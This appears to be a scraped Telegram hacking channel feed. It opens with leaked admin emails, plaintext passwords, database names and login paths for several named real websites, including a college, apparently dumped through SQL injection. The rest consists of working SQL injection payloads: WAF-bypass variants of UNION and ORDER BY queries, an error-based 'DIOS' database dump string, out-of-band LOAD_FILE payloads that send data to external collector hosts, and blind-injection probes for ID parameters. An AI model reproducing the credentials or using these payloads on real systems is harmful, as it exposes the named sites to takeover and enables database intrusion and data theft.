🌐 https://www.ntbcl.com
👤 name: Admin
📧 email: [email protected]
🔓 password: NewP30MAY@$#
🚫 login page: N/A
#web #sql
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
👤 name: Admin
📧 email: [email protected]
🔓 password: NewP30MAY@$#
🚫 login page: N/A
#web #sql
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
🌐 aeronsindia.com
👤 Name: Admin
📧 Email: [email protected]
🔓 Password: admin12345
📧 Email: [email protected]
🔓 Password: 123
🆚 Version: 5.6.51
🗂 Database: aeronsin_web
🚫 login page: N/A
#web #sql
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
👤 Name: Admin
📧 Email: [email protected]
🔓 Password: admin12345
📧 Email: [email protected]
🔓 Password: 123
🆚 Version: 5.6.51
🗂 Database: aeronsin_web
🚫 login page: N/A
#web #sql
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
🌐 https://www.simscollege.ac.in
👤 Username: admin
🔓 Password: simsxyz
🆚 Version: 10.5.22-MariaDB
🚫 Database: N/A
✅ login page: /members.php
#web #sql
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
👤 Username: admin
🔓 Password: simsxyz
🆚 Version: 10.5.22-MariaDB
🚫 Database: N/A
✅ login page: /members.php
#web #sql
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
SQL Injection Bypass
—————————
if your target have waf you should bypass that to access the database.
Lets start 🥷🏽
#sqli #sql_injection
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📢 t.iss.one/BugCod3
—————————
if your target have waf you should bypass that to access the database.
Lets start 🥷🏽
ORDER BY —>
/*!50000Order*/by
/*!50000order*//*!50000by*/
/*!50000OrdeR*/By
/*!50000ORDER*//*!50000BY*/
/**A**/Order by
Order/**A**/By
/**/**/ORDER/**/BY/**/**/
Null' order by
O0x72der b0x7920
Union —>
/*!50000union select
/*!50000Union*//*!50000Select*/
/*!12345union*//*!12345select*/
/**A**/union select
union /**A**/ select
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt
%23%0AUnion%23aaaaaaaaaa%0ASelect%23%0A1
+?UnI?On?+'SeL?ECT?
group_concat —>
group_concat(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
unhex(hex(group_concat(table_name)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
from table_name —>
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!50000frOm*/+/*!50000information_schema*/%252e/**/columns
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
#sqli #sql_injection
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📢 t.iss.one/BugCod3
❤6❤🔥2👍1
BugCod3
#SQL #Dios #Bypass #Waf #POC
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2❤1👍1
Advance Error Based My SQL 5.5 (DIOS)
/Bypass My SQL 5.5 version dump database error/
DIOS:
#SQL #Dios #Bypass #POC
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📢 t.iss.one/BugCod3
/Bypass My SQL 5.5 version dump database error/
DIOS:
and(select+x*1E308+from(select+concat(@:=0,(select+count(*)from+information_schema.tables+where+table_schema=database()+and@:=concat(@,0x0b,table_name)),@)x)y)
#SQL #Dios #Bypass #POC
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📢 t.iss.one/BugCod3
⚡3❤1
Advanced SQL Injection for AWAE
Goal is to master SQL Injection Discovery, Detection and Exploitation
📊 Table of Content:
- Learning a lil' bit of SQL
- SQL Injection Methodology Overview
- MYSQL Injection Methodology
- MySQL Error or UNION Based SQLi
- Routed Queries (Advanced WAF Bypass for Error or UNION based MySQLi)
- WorkAround when UNION queires doesn't work (MySQL Error Based SQLi)
- The Alternative ways of using
- The Alternative ways of using
- The Alternative way of using
- MySQL Boolean Based Blind SQLi
- MySQL Time Based Blind SQLi
AND...
😸 Github
⬇️ Download
🔒
#Sql #Injection #AWAE
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Goal is to master SQL Injection Discovery, Detection and Exploitation
- Learning a lil' bit of SQL
- SQL Injection Methodology Overview
- MYSQL Injection Methodology
- MySQL Error or UNION Based SQLi
- Routed Queries (Advanced WAF Bypass for Error or UNION based MySQLi)
- WorkAround when UNION queires doesn't work (MySQL Error Based SQLi)
- The Alternative ways of using
AND/OR 0 in SQLi- The Alternative ways of using
NULL in SQLi- The Alternative way of using
WhiteSpace in SQLi- MySQL Boolean Based Blind SQLi
- MySQL Time Based Blind SQLi
AND...
BugCod3#Sql #Injection #AWAE
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4🔥2❤1👍1
Out-of-Band SQL Injection
Payload:
#BugBounty #Tips #SQL
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Payload:
'11111111111' AND (SELECT LOAD_FILE('\\\\https://xde3imh45q8x9o4ovz1kea6cd3ju7kv9.oastify.com\\a'))
'11111111111' AND (SELECT CONCAT('', (SELECT SLEEP(5)), (SELECT LOAD_FILE(CONCAT('\\\\', (SELECT 'https://14379q88wuz10svsm3so5exg47ayyqmf.oastify.com/a'))))))#BugBounty #Tips #SQL
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
❤3👍3🔥2⚡1
SQL injection ID parameter
?id=1' order by 1 --+
?id=1' and "a"="a"--+
?id=1' and database()="securtiy"--+
?id=1' and substring(database(),1,1)="a"--+
?id=1' and sleep(2) and "a"="a"--+
?id=1' and sleep(2) and substring(database(),1,1)="a"--+
#SQL #Injection #Tips
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
?id=1' order by 1 --+
?id=1' and "a"="a"--+
?id=1' and database()="securtiy"--+
?id=1' and substring(database(),1,1)="a"--+
?id=1' and sleep(2) and "a"="a"--+
?id=1' and sleep(2) and substring(database(),1,1)="a"--+
#SQL #Injection #Tips
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
🔥5❤3⚡1